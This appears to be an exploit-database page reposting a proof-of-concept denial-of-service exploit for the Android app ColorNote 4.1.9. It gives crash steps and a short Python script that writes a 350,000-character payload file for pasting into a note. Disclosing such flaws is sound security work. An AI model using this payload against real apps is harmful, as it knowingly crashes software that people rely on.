colornote 4.1.9 denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & android vulnerability Code...
 Code...
				
# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC) # Date: 2021-06-02 # Author: Brian RodrÃguez # Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX # Version: 4.1.9 # Category: DoS (Android) ##### Vulnerability ##### Color Note is vulnerable to a DoS condition when a long list of characters is being used. # STEPS # # Open the program # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt in the new note. # Click the "Return" button twice. # Start clicking the screen. # Crashed Successful exploitation will causes application stop working. I have been able to test this exploit against Android 8.0. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
Colornote 4.1.9 denial of service (poc) Vulnerability / Exploit Source : Colornote 4.1.9 denial of service (poc)
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes